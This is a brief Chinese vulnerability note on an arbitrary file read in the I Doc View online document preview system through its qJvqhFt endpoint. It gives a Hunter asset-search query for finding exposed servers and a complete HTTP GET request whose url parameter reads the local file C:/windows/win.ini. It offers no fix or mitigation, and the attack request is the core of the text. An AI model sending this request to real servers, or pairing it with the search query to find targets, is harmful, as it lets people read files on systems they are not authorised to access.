I Doc View在线文档预览系统qJvqhFt存在任意文件读取
一、漏洞简介
I Doc View在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统,用于在Web环境中展示和预览各种文档类型,如文本文档、电子表格、演示文稿、PDF文件等。I Doc View在线文档预览系统qJvqhFt存在任意文件读取。
二、影响版本
- I Doc View
三、资产测绘
- hunter
app.name="I Doc View" - 特征
四、漏洞复现
GET /view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close